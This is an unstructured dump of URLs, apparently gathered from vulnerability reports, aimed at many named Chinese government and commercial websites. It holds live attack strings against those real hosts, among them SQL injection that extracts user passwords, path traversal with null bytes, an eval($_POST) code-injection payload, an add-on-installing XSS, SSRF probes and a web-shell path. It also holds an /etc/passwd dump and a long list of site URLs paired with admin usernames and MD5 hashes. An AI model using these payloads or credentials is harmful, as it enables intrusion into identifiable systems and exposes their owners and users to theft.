http://www.ccat.net.cn/info/detail.asp?strParentCode=news&strInfoTypeCode=news_87&intInfoID=1358 http://www.ccat.net.cn/info/login_check.asp http://www.ccat.net.cn/zscx/zscx.asp http://www.hbinvest.gov.cn/prws/investment/reg_Step1.aspx http://www.yjzjj.gov.cn/hf.php?zid=444 http://www.yjzjj.gov.cn/dcdb_index_info.php?id=84 http://www.yjzjj.gov.cn/dcdb_index_list.php?page=1&find=&gjz= http://www.yjzjj.gov.cn/bxpt/search.php?st=0&sk=t&sd=d&sr=topics&sid=9b87931094abf9a1cdbc48deb19d5a23&search_id=unanswered http://www.tcrc.com.cn/Company/Jobs_Search_List.aspx?IndustryID=255&PositionID=255&JobsType=no&JobsKind=255&JobsCity=255&JobsExp=255&JobsLevel=255&JobsSex=255&ComNature=255&ComMemberNum=255&KeyWord=No&Pages=1&COMCONFIRMATION=1 http://bztg.ahbz.gov.cn/page/?content=%5B http://www.ytstc.gov.cn/msglist.aspx http://www.gzgtzy.gov.cn:83/zlml_Detail.aspx?id=1 http://www.gzgtzy.gov.cn:83/SysManLogin.aspx http://218.244.247.142/chinanews/ http://218.244.247.142/chinanews/conn.asp http://218.244.247.142/chinanews/system_manager/login.asp http://218.244.247.142/chinanews/review_list.asp?bookid=1204200009 http://www.lz.chinanews.com http://www.lz.chinanews.com/Newslist.aspx?ClassID=8 http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5589 http://www.lz.chinanews.com/ShowEC.aspx?NewsID=5518 http://www.lz.chinanews.com/g.rar http://www.jyb.cn/digg/jsiframe.php?id=160 http://admin.ask.jyb.cn/ask.php?c=49,55,56,62,59,64,63,60,61 http://admin.ask.jyb.cn/Login.php http://gxsjk.jyb.cn/searchLqfs.html?province= http://admin.zhnews.net/vote/vote.php?ud_id=71 http://www.hebmz.gov.cn/next.jsp?ID=06 http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008 http://www.cba.gov.cn/cbastats/wcba/teamdetail.aspx?id=WTe004 http://www.cba.gov.cn/cbastats/wcba/calendarsearch.aspx?startshift=4&endshift=19&teamno=WTe004 http://www.jljl.lss.gov.cn/index.asp www.jljl.lss.gov.cn/ybcx.asp http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14 http://www.gdofa.gov.cn/index.php/Search?kw=a http://www.hljzx.gov.cn/News/SearchList.aspx?S_ID=-1&CMD=a%27%20and%201=%28select%20substring%28%28select%20UserID,U_LoginName,U_Password%20from%20sys_User%20for%20xml%20auto%29,1,4000%29%29-- http://www.ccat.net.cn/certificates/ http://bbs.mca.gov.cn/showcommonposts.php?length=31&pagesize=7&fid=7 http://bbs.mca.gov.cn/showtopclicks.php?pagesize=7 http://aqzj.chinasafety.gov.cn/zj/zjkp_disp.jsp?yhid=1 http://hk.we.jiepang.com/ http://www.baozouwushuang.com/index.php?c=news&m=get_news_by_id&id=193 http://golf.cctv.com/search.php http://www.mianxian.gov.cn/appeal/form.jsp?model_id=1 http://www.xiangshe.com/ http://tw.we.jiepang.com/ site:tianqitong.sina.cn http://tianqitong.sina.cn/bjl/ http://oa.sto.cn/e3oa/down/down.html http://wap.dooland.com/b.php http://wap.dooland.com/b.php?id=9112&verify=dGVzdGVyMTIzLTk2ZTc5MjE4OTY1ZWI3MmM5MmE1NDlkZDVhMzMwMTEy http://www.zijiqu.com/ http://www1.jiande.gov.cn/web/config.asp http://www1.jiande.gov.cn/web/ http://www1.jiande.gov.cn/web/CFCount/CounterPic/14/zf/0.html http://www.chinamengshan.com/admin/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiaGFjayBieSBweDE2MjQiKTwvc2NyaXB0Pg== site:wyn88.com http://vcas.wyn88.com:8085/ http://www1.wyn88.com/ http://www1.wyn88.com/admin/ http://we.wyn88.com/Account/ChangePassword?uName=admin http://mail.wyn88.com/ http://mail2.wyn88.com/ http://km.wyn88.com/vmain/login.jsp http://service.wyn88.com/COLBooking.asmx http://wifi.wyn88.com/wlan/ http://www.baidu.com/#wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E6%A0%A1%E6%97%A0%E5%BF%A7%E7%A7%91%E6%8A%80&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=1&rsv_sug4=88&inputT=0 http://www.google.co.in/search?newwindow=1&q=inurl%3AArticle.asp%3Fid%3D+%E6%A0%A1%E6%97%A0%E5%BF%A7%E7%A7%91%E6%8A%80&oq=inurl%3AArticle.asp%3Fid%3D+%E6%A0%A1%E6%97%A0%E5%BF%A7%E7%A7%91%E6%8A%80&gs_l=serp.12...20592744.20601689.0.20602648.3.3.0.0.0.0.310.430.0j1j0j1.2.0....0...1c.1.35.serp..3.0.0.aJksRrsk3e4 http://114.251.247.78:8100/jmx-console/ http://www.phpcms.cn/html/download/ http://lbs.189.cn/caches/bakup/default/phpcmstables_20121002_4005_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20121025_1622_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20121109_8080_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130111_8458_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130310_2536_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130312_1791_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130312_9620_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130315_1614_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130409_2817_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130422_3301_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130607_8450_1.sql http://lbs.189.cn/caches/bakup/default/phpcmstables_20130618_6409_1.sql http://e.dooland.com/ http://e.dooland.com Google:site:gov.cn inurl:law_artile.jsp http://yunnan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://jiangxi.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://hebei.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanghai.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://sichuan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://neimeng.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://www.jubao.gd.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://henan.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://anhui.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://heilongjiang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://tianjin.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://hubei.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://fujian.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://chongqing.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.lvliang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.yangquan.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.jincheng.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.datong.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://shanxi.jinzhong.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://guangxi.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://hunan.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://xizang.12388.gov.cn/jubao/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://haerbin.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://xinjiang.12388.gov.cn/site/law_artile.jsp?id=../../scripts/site.js?%00.jpg http://202.99.197.93:8080 http://115.182.59.168:8081/ http://115.182.59.168:8080/.svn/entries http://115.182.59.168:8083/.svn/entries http://115.182.59.114:8081/.svn/entries http://www.sgzx.fx.edu.sh.cn/info_list.jsp?categoryId=04&pagination=1 http://www1.weiyu.sh.cn/po35/info_list.jsp?categoryId=08 http://www.hshsh.pudong-edu.sh.cn/info_list.jsp?categoryId=52&pagination=1 http://121.207.252.250:8081/ http://121.207.252.250:8081/.svn/entries http://bbs.siteserver.cn/ http://122.227.190.215/Login.aspx http://127.0.0.1/index.php?m=member&c=index&a=login zhushou360://type=apk&name=360安全助手&url=http://127.0.0.1/1.apk http://drops.wooyun.org/papers/548。 http://my.meishichina.com/ http://my.meishichina.com/pianfang/?q={${eval%28$_POST[c]%29 site:wx.qq.com http://bbs.pigai.org/blog-1617522-1254.html inurl:/riseapprove_web/secondPage/ http://bsdt.nantong.gov.cn/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=35&serviceType=2 http://58.221.172.27:9080/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=28&serviceType=2 http://58.221.162.227:9080/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=30&serviceType=2 http://58.221.206.243:9080/riseapprove_web/secondPage/burgherServiceDetail.do?sort_ID=2&serviceType=1 http://www.rdzw.gov.cn/rdzw_data/secondPage/burgherServiceDetail.do?sort_ID=7&serviceType=1 http://member.juran.com.cn http://www.oa169.com:97/ifrmae/enp/main.asp http://www.wyn88.com/promotion/listc1.html?area=Kbp3zJwh www.xunzai.com/android/index.php?ac=ajax&ct=count_form http://ot.wap.sogou.com/video/getjson.jsp?url=http://192.168.21.43/mod.php?mod=2013-11-07 http://ot.wap.sogou.com/video/getjson.jsp?url=http://192.168.21.43/mod.php?mod=2013-11-07 http://ot.wap.sogou.com/video/getjson.jsp?uID=XWc9M7DeeV27nmz0&url=http://10.12.10.155 inurl:celerityAlleywayDetail.do http://222.184.252.158:9080/riseapprove_web/secondPage/celerityAlleywayDetail.do?type=6&codeID=0001000146&nowPage=47 http://58.221.206.243:9080/riseapprove_web/secondPage/celerityAlleywayDetail.do?codeID=0001000147&type=1 http://zwdt.tz.gov.cn/riseapprove_web/secondPage/celerityAlleywayDetail.do?type=1&codeID=0001000147&nowPage=2 http://www.lyaudit.gov.cn/Contents.aspx?SerialNo=745 http://www.lyaudit.gov.cn/InfoMationList.aspx?TypeID=003011 http://uzblog.uz.taobao.com/imgdemo.php http://www.lenovo-ibm.net http://enfodesk.com/SMinisite/newinfo/search.html http://sports.letv.com/zt/workhard/index.shtml http://sports.m.letv.com/sports/login/auth http://ips.lenovo.com.cn/Login/CheckChangePassword http://222.82.232.227:9991/bscx!bjgs.action http://www.jhgs.gov.cn:9000/jdqy/jdqy_jdqyListXyxx.action http://122.224.75.235:7088/login/index.action http://www.sxxgsj.gov.cn:7001/w!wyzx.action?wshd.type=2 http://www.sygs.gov.cn:8888/syhd-jgwmg/jgwmg/detail.action?id=14299&channelId=8518&parid=8506 http://61.185.238.204:7001/enterNews.do http://221.12.117.248:8888/syhd-xxpt/cms/article_detail.action?newsId=13235&type=030001 http://www.zdsoft.net/moreinfo.aspx?layoutTemplateId=1201&bigClassId=266571 http://220.197.220.60/desktop/login/login.action http://220.172.104.211/desktop/login/login.action http://oa.tyedu.com.cn/desktop/login/login.action http://oa.tyedu.com.cn/desktop/login/login.action为例,应该是三通两平台系统: http://61.130.145.181/webgps/Login.aspx www.anta.com/index.php正常访问。 www.anta.com/indeX.php提示文件不存在。 http://common.fj.sina.com.cn/index.php/201207hall/admin/index http://www.monstercable.com.cn/Admin/Index.Asp存在弱口令admin,admin,可导致进一步渗透,并泄露大量魔声注册用户信息。 http://121.14.39.216:9190/stat/ http://www.xfgjj.com http://www.xfgjj.com/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://www.xfgjj.com/rss.asp http://jc.cscec2b3c.com/index!loginout.do http://bid.elion.com.cn/index!loginout.do http://gcztb.zhongnangroup.cn:8381/index/tender/indexTender!queryBulletinPage.do http://hf.52xinyou.cn/do.html http://tieba.baidu.com/mo/q/checkurl?url=//www.google.com http://www.dooland.com/magazine/ReadStat http://www.zoomla.cn/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey Url:http://demo.zoomla.cn/Edit/ShowEdit.aspx?Dir=&OpenWords=TxtTagKey http://ideapad.it168.com/ http://productbbs.it168.com/ http://jiyouhui.it168.com/ http://photobbs.it168.com/ http://dell.benyouhui.it168.com/ http://b.it168.com/ http://benyouhui.it168.com/ http://lephone.it168.com/ http://sebbs.it168.com/ http://anycall.it168.com/ http://diybbs.it168.com/ http://oaweixiu.it168.com/ http://ce.it168.com/ http://acer.it168.com/ http://lepad.it168.com/ http://digital.it168.com/ http://security.jd.com///Public//userfile//201402//27100414_.jpg http://www.wyn88.com/roomstatus/tuangouroomlist?city4403&hotelid=fAF742SW&indate=2014-02-26&outDate=2014-02-27&v=0.4539814339950681&_=1393378750508 http://home.hangzhou.com.cn/ http://love.hangzhou.com.cn/ http://home.hangzhou.com.cn/pic.php?pic_id=1330176_6 http://home.hangzhou.com.cn/fit_demo.php?product_id=1334587_106 http://love.hangzhou.com.cn/index_User.aspx?Sex=%e7%94%b7 http://love.hangzhou.com.cn/Club_hd_hg_Content.aspx?id=94 http://love.hangzhou.com.cn/index.aspx http://211.65.227.4/lw/Login.aspx?ReturnUrl=%2flw%2fadmin%2fDefault.aspx http://extension.maxthon.cn/all/index.php?keyword=%22/%3E%3Cimg%20src=x%20onerror=%22external.mxCall%28%27InstallApp%27,%20%27http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon%27%29;%22/%3E http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon插件 http://api.cg.7k7k.com/contest/get_nearestplaylist.php?kk=2565412332&num=3 http://210.22.123.76:8081/uniportal/frame/welcome.action http://demo.taodiantong.com/?mod=ucp&do=order_details&order_id=1 http://www.jiongxiyou.cn/ display:none;”删除,可以达到利用汇率逻辑错误漏洞的目的。 ftp://ftp.founder.com.cn/incoming/ http://iphone.dooland.com/s.php?id=1958 http://www.hnahotelsandresorts.com http://www.hnahotelsandresorts.com/ajax/AjaxHandler.ashx POST:cmd=corder&id=123123123&name=adads http://www.csbidding.com/nhzb/infoListAction.do?show=law&outs=原来的页面应该是http://www.csbidding.com/nhzb/infoListAction.do?show=law&outs=outs去掉后罪名就进去了,那个页面可以编辑 http://www.csbidding.com/nhzb/infoListAction.do?show=law&outs= http://www.hnahotelsandresorts.com/destinations/review.aspx?orderid= http://www.hnahotelsandresorts.com/destinations/select.aspx?hid=24&id=25&ArrivalTime=2014-02-27&DepartureTime=2014-02-28&fangshuliang=1&renjian=1&hcode=bjsjs http://member.jiuxian.com/pay_password.htm?step=2 http://member.jiuxian.com/chk_new_mob.htm http://111.13.55.55/webmanage/index.jsp http://univ1.zte.com.cn/XsExam/Application/ForePlatform/Exam_ErrorQestion_Analyse.aspx?examNo=55239&studentNO=20070910056177 http://eps.hikvision.com/custom/groupnewslist.aspx?GroupId=107&companyid=1 http://eps.hikvision.com/custom/groupnewslist.aspx?GroupId=107&companyid=3-2 http://www.bestay.com.cn/Web/Member/OrderDetail.aspx?orderid=CC20140227006019 http://mis.jj-inn.com http://mis.jj-inn.com/jmx-console/ http://www.sxtarena.com/wwwroot.zip http://www1.jiande.gov.cn/web/CFCount/ http://www1.jiande.gov.cn/web/CFCount/Data/ http://www1.jiande.gov.cn/web/CFCount/Admin.asp http://www1.jiande.gov.cn/web/CFCount/CF_Admin_Manage.asp http://www1.jiande.gov.cn/web/CFCount/CounterPic/14/zf/5.html http://www1.jiande.gov.cn/web/CFCount/CounterPic/14/zf/ http://www1.jiande.gov.cn/web/CFCount/CounterPic/32/lpt1.config.asp http://www1.jiande.gov.cn/web/config.asp http://www.chsis.org/admin/ http://www.cailele.com/static/min?f=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.js root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin terry:x:301:301::/home/terry:/bin/bash www:x:900:900::/www:/bin/bash cactiuser:x:901:901::/home/cactiuser:/bin/bash mfs:x:608:608::/home/mfs:/sbin/nologin oracle:x:175:115:Oracle Owner:/home/oracle:/bin/bash smolt:x:302:303:Smolt:/usr/share/smolt:/sbin/nologin http://www.hbgh.gov.cn/ http://10.B10.C200.D94:8080存在Jenkins的未授权访问,在脚本命令行处可以执行任意命令。 https://****.****.letv.cn:***** letv:TV*******)并登录 http://wooyun.org/bugs/wooyun-2013-039066 root:WJZX****** http://www.jiemeijie.com/public/db_backup/20140228025755.php/member/0.sql http://www.ygshangjie.com/ http://mall.heilanhome.com/mem_center/index/show_address&app_page=null&address_id=44320 http://www.ynxdfpr.com/ http://csxdf.com/ http://www.bjxdf.com/?baidu_pinpai http://www.jsxdf.com/ http://media4.open.com.cn/L603/dongshi/0803/xifangjjx/shijuan/sjsearch.asp http://media4.open.com.cn/L603/dongshi/0803/xifangjjx/admin/Admin_Login.asp http://media4.open.com.cn/L603/dongshi/0803/xifangjjx/admin/ewebeditor/UploadFile/AspxSpy2014Final.aspx EMC-SNAS:T7.0.54.6 EMC-SNAS:T7.0.54.6 http://mmog.ourgame.com/存在SQL注入,能获得管理员和普通用户的用户名和密码,可能造成用户数据泄露,并面临被脱裤的危险。 http://w.game.tom.com/ http://support.ufida.com.cn/nmorenewslist10.asp?queryUser=a http://support.chanjet.com/getpwd/AjaxEvent.aspx?Event=GetEmail&value=admin%27 http://support.ufida.com.cn//kbm/kbmlist2.asp http://www.abingjs.com UserName:admin MD5:3e7a64d84683d218 http://www.sunnyi.cn UserName:kicshop7356 MD5:0d735d1d077e5e24 http://www.duhoo.net UserName:admin MD5:a7389ec9ad889c29 http://www.0731jkj.com UserName:xzs MD5:fcec6c9ff7085e39 http://www.dailysilver.org UserName:admin MD5:86c7fbcd6ecf5109 http://www.zgwhzsh.com UserName:yangyinghao1986 MD5:6e15b19a4038f470 http://www.2h2d.com.tw UserName:xiangge MD5:b1827488e9f7eff2 http://www.mobage.tw UserName:admin MD5:96b405ddbdad8f74 http://www.emxinc.cn UserName:admin MD5:e18b5117f85a6346 http://www.sdjgj.gov.cn UserName:admin MD5:14d9995171425f42 http://www.makkee.com.hk UserName:admin MD5:7a57a5a743894a0e http://www.szgt.gov.cn UserName:admin MD5:b93a0dc3b77e2c3f http://www.tpdmacao.org UserName:admin MD5:6ea6b7fa02701b1e http://www.scncpa-l-tax.gov.cn UserName:admin MD5:14867e1ed882aac2 http://www.xjcare.com UserName:admin MD5:8bc0d65d453b6f23 http://www.p-expo.com UserName:zhsp MD5:1e1d244ffb13f2e6 http://www.jshuabo.com UserName:admin MD5:049c26fd1a481a7d http://www.tzfeilu.com UserName:tzgly MD5:7a57a5a743894a0e http://www.annoroad.com UserName:admin MD5:7136b455e18b5e2c http://www.jnwater.com.cn UserName:jnwater MD5:8e471f1a0b8440ad http://sdjn.evergrande.com UserName:admin MD5:3a416e73140f2d19 http://www.cbfq.cn UserName:admin MD5:f9b98be32100c3a1 http://bjuu.xdf.cn UserName:admin MD5:d2e917195d57a8b8 http://www.cautism.com UserName:kangda MD5:0e0b2e56dc5d5905 http://www.amt.com.cn UserName:admin MD5:ec411cb0044be977 http://www.d-heaven.com UserName:cmsadmin MD5:50ea5839b500fd74 http://nsca-shanghai.com.cn UserName:admin MD5:bc356ff2d42e0dcf http://www.zmnedu.com UserName:admin MD5:7925a2c5b49147ff http://www.cis-expo.com UserName:admin MD5:59c5e1d09a804986 http://www.zoyue.com UserName:chinawwhb MD5:df5ab255f3c91ae5 http://www.ugitc.com UserName:admin MD5:a7a0bd9ef71d8cf9 http://www.eb5yimin.com UserName:yimin MD5:12b0fa625f9c6733 http://www.gzptly.com UserName:cncolour MD5:4d7191e8c276e745 http://www.weilanshi.com UserName:admin MD5:571e55e4f3544600 http://www.jsjyha.com UserName:admin MD5:c10beb229a472662 http://www.the9edu.com UserName:admin MD5:b2b4dcab418c486b http://www.csc114.com UserName:admin MD5:fc74c3c9621715ba http://www.cnasthma.com UserName:nahan MD5:c831b04de153469d http://old.5tv.com.cn UserName:admin MD5:67ac90f8b98ab4b8 http://www.fanstour.com UserName:zhf@ MD5:95de932938d9a947 http://www.yfzdc.com UserName:admin MD5:28c460b82f54fb43 http://www.astv.com.cn UserName:admin MD5:6901773399d581a7 http://www.ginzza.net UserName:teqhost MD5:9ebb052280d37ccd http://www.habc.org.cn UserName:habc MD5:469e80d32c0559f8 http://www.gdsme.org UserName:admin MD5:534232ee8a562849 http://www.bdwsj.gov.cn UserName:admin MD5:1456b237f44533a0 http://fzone.oushinet.com UserName:admin MD5:45e3f273326e4ea3 http://www.kidney-cares.org UserName:administrator MD5:3b407eafc243a082 http://www.dbond.net UserName:chuming MD5:6ba60d779d0aebbb http://www.hnsbxh.org UserName:abc MD5:5e55395d57dc3f8a http://www.imwchina.com UserName:admin MD5:d1e9b30508e63064 http://www.dgtoyota.com UserName:myadmin MD5:65914e6f8121f88c http://www.daojiayouxue.com UserName:admin MD5:b9a0f64d09f6ab68 http://www.yxlw.org UserName:cdgadmin MD5:d08214e252decf49 http://www.trust-trust.com UserName:stadmin1 MD5:79558095a64eb822 http://www.simon-sh.com UserName:webadmin MD5:e139be103324d04d http://www.forhead.org UserName:admin MD5:69b1e3ec2f699258 http://www.wssng.com UserName:admin MD5:bfb709dd58931f5f http://www.lzmcwx.com UserName:admin MD5:4b88cd2afde80fd2 http://www.hrzh.org UserName:admin MD5:ac8fc472994386de http://grandmarkrealty.net UserName:admin MD5:786624e951f4fcbf http://www.xbtcm.com UserName:admin MD5:9dc96c496966a7f6 http://pingnannews.com UserName:admin MD5:e2a900c259ab31e3 http://www.gzyjtoyota.com UserName:myadmin MD5:65914e6f8121f88c http://www.cchmis.cn UserName:CcadMaster MD5:568393db540b9ad1 http://www.xzxinli.com UserName:admin MD5:4b143e089e10b1ea http://www.uestcp.com.cn UserName:liujinsong MD5:a85340b1e913e0f7 http://www.hzxhly.gov.cn UserName:admin MD5:93e482461b714777 http://nkbayy.com UserName:admin MD5:029cf707939e886e http://www.yz918.com UserName:xtybfgu MD5:52376ea9c7864ec8 http://hee.ctgu.edu.cn UserName:admin MD5:2745542386421305 http://www.sygdw.com UserName:sygdw MD5:291c3bb684559dfd http://www.tongcard.net UserName:admin MD5:06150a04f5c163bb http://www.koons.com.cn UserName:admin MD5:3996abdb71e2b508 http://www.valveyoto.com UserName:admin MD5:c1f3a636c05f8257 http://www.rw-wine.com UserName:ruiwen_com2 MD5:891715ef8ceb1f7b http://lib.qionghai.gov.cn UserName:abc MD5:5e55395d57dc3f8a http://www.redbudgroup.org.cn UserName:redbud_admin MD5:33b34179526e12fa http://www.fiesta.com.hk UserName:admin MD5:204233f582152996 http://www.fzys120.com UserName:admin MD5:39ff38e667472281 http://www.duoge007.com UserName:duoge MD5:cd75f87177b6febe http://www.jssybz.com UserName:sydw MD5:7a57a5a743894a0e http://www.dianfei.org UserName:admin MD5:b4242280103410dd http://zjjzc.com UserName:zjjweb MD5:464f0b3d6e2efc34 http://www.013578.com UserName:JINCHENG MD5:72c1cef643c98e3a http://www.66663333.com UserName:admin MD5:a5c9293c54538f08 http://www.ka147.com UserName:admin MD5:11c605acc3884920 http://www.114228.com UserName:admin MD5:1fafc8de44826dcc http://www.zikaohn.com UserName:33739321 MD5:65065adf021239e3 http://www.syygyy.com UserName:cityroom MD5:9c9105140e72c7dd http://www.lzhxzx.net UserName:admin MD5:c768f674f3c92add http://www.yixtnb.com UserName:admin MD5:edbe6a86266db44f http://www.refeng.net UserName:papaya MD5:373f8e6fc6733f27 http://www.zaozhuangly.com UserName:admin MD5:49ba59abbe56e057 http://www.86123123.com UserName:admin MD5:17e72fccd326b99f http://www.zdhbo.com UserName:admin MD5:7652bd870b7cecb0 http://www.sccj6.com UserName:admin MD5:1a4224be9e6c0b72 http://www.yaosuanteng.com UserName:mafeng MD5:8bd3e402498dce41 http://www.086kqw.com UserName:admin MD5:5b16336c3d67ba49 http://www.yotolo.com UserName:tujyce MD5:03d53c9a2395b002 http://www.tmwh.com UserName:admin MD5:164dbb260505c63d http://www.goozjj.com UserName:admin MD5:b43a54b73b6a221f http://www.hyzhengxing.com UserName:admin MD5:e32ec5c3f5a117b4 http://www.bjbaoye.com UserName:byadmin MD5:3a2cd1a22cea1640 http://www.bjchmnw.com UserName:admin MD5:3bae929f37819e58 http://www.biantawang.com UserName:mym MD5:f200218ff5285ab0 http://www.dgxxw.net UserName:hbpeixun MD5:576e62b2d91c7470 http://www.naisee.com UserName:cgaga MD5:3f1126d1e89c3eed http://dhaow.com UserName:admin MD5:7a57a5a743894a0e http://zuimeijia.com UserName:admin MD5:f615b40fd9022ef0 http://www.516diy.com UserName:zhoucheng MD5:c6139c908de4a604 http://www.gxbyby.com UserName:admin MD5:deef630e71f718d9 http://www.siyin123.com UserName:admin MD5:eb853cd377ff4934 http://www.yingqin.org UserName:yingwenhua MD5:49ba59abbe56e057 http://www.losewz.com UserName:admin MD5:13d2f30b108c3f8c http://www.021shangbiao.com UserName:admin MD5:5a55685595a72b2c http://www.xinkegbyy.com UserName:admin MD5:2ce4a75eb264485b http://www.sh414.com UserName:shenekin MD5:247c7fb160a440dd http://www.shiyoupeixun.com UserName:mqzhqf MD5:25c1daccb05322d6 http://www.hxxt.cn UserName:admin MD5:a24cfb649f754bb0 http://www.nm18.com UserName:apider MD5:4efe0b194e966523 http://www.tao1638.com UserName:admin MD5:7a57a5a743894a0e http://www.tailum.com UserName:admin MD5:ad961b25c9b37e7f http://www.tsgbyy.com UserName:admin MD5:49ba59abbe56e057 http://www.mydcj.com UserName:bianhy MD5:39576dd3c96ed626 http://www.120xd.com UserName:admin MD5:13955235245b2497 http://www.renliu365.com UserName:0779admin MD5:ade0ca12790eb95c http://www.028chuzhou.com UserName:admin MD5:f1ee5a1be7bb4fe8 http://www.tiandily.com UserName:tiandily2010 MD5:f5facda10893b2e2 http://www.zgditan.com UserName:admin MD5:f74ec646b7890896 http://cn.west.travel UserName:admin MD5:bfa64cbcea931592 http://www.5k58.com UserName:my_admin MD5:63d4b32999ceb403 http://www.ynguzhen.com UserName:admin MD5:da7de4810c96042f http://www.tjbfyy.com UserName:admin MD5:e338c11d91a56de5 http://www.17jzg.com UserName:admin MD5:3f53f9fc4e1b51ca http://www.catholic.cd UserName:admin MD5:335cc2acb8ce87fb http://www.ziweifu.com UserName:leadcom MD5:37a7ce29dc602a59 http://www.jpxf.com UserName:admin MD5:005bf9a430660367 http://www.dipujie.com UserName:admin MD5:7a57a5a743894a0e http://www.gk116.cn UserName:admin MD5:f920ca1c9f9a5ec8 http://www.hep6.com UserName:admin MD5:3075dcad135e26cd http://www.mbzhan.com UserName:admin MD5:affaa0cca5eecba7 http://www.jzmoban.com UserName:admin MD5:bc5d348b09b42fad http://www.bdfch.com UserName:admin MD5:a0f32b688a015346 http://www.5loveb.com UserName:admin MD5:b9f1e3d940d5aa12 http://www.youkeyou.com UserName:fanren MD5:b9e2e489de343173 http://www.sdzsxx.net UserName:admin MD5:9e2b8eae02a5606b http://www.119cumt.com UserName:admin MD5:b02759daf7814712 http://www.51ou.com 